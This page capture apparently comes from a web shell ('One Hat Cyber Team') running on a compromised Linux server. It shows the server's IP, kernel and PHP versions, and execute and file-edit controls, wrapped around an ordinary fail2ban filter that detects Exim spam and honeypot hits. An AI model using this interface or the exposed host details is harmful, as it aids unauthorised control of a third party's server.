⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
fail2ban
/
dist-config
/
filter.d
/
Edit File: exim-spam.conf
# Fail2Ban filter for exim the spam rejection messages # # Honeypot traps are very useful for fighting spam. You just activate an email # address on your domain that you do not intend to use at all, and that normal # people do not risk to try for contacting you. It may be something that # spammers often test. You can also hide the address on a web page to be picked # by spam spiders. Or simply parse your mail logs for an invalid address # already being frequently targeted by spammers. Enable the address and # redirect it to the blackhole. In Exim's alias file, you would add the # following line (assuming the address is honeypot@yourdomain.com): # # honeypot: :blackhole: # # For the SA: Action: silently tossed message... to be logged exim's SAdevnull option needs to be used. # # To this filter use the jail.local should contain in the right jail: # # filter = exim-spam[honeypot=honeypot@yourdomain.com] # [INCLUDES] # Read common prefixes. If any customizations available -- read them from # exim-common.local before = exim-common.conf [Definition] prefregex = ^%(__prefix_line)s<F-CONTENT>.+</F-CONTENT>$ failregex = ^\s?\S+%(host_info)s rejected by local_scan\(\): .{0,256}$ ^%(host_info)s rejected RCPT [^@]+@\S+: .*dnsbl.*\s*$ ^\s?\S+%(host_info)s rejected after DATA: This message contains a virus \(\S+\)\.\s*$ ^\s?\S+ SA: Action: flagged as Spam but accepted: score=\d+\.\d+ required=\d+\.\d+ \(scanned in \d+/\d+ secs \| Message-Id: \S+\)\. From \S+ \(host=\S+ \[<HOST>\]\) for <honeypot>$ ^\s?\S+ SA: Action: silently tossed message: score=\d+\.\d+ required=\d+\.\d+ trigger=\d+\.\d+ \(scanned in \d+/\d+ secs \| Message-Id: \S+\)\. From \S+ \(host=(\S+ )?\[<HOST>\]\) for \S+$ ignoreregex = [Init] # Option: honeypot # Notes.: honeypot is an email address that isn't published anywhere that a # legitimate email sender would send email too. # Values: email address honeypot = trap@example.com # DEV Notes # ----------- # The %(host_info) definition contains a <ADDR> match. No space before. See exim-common.conf
Simpan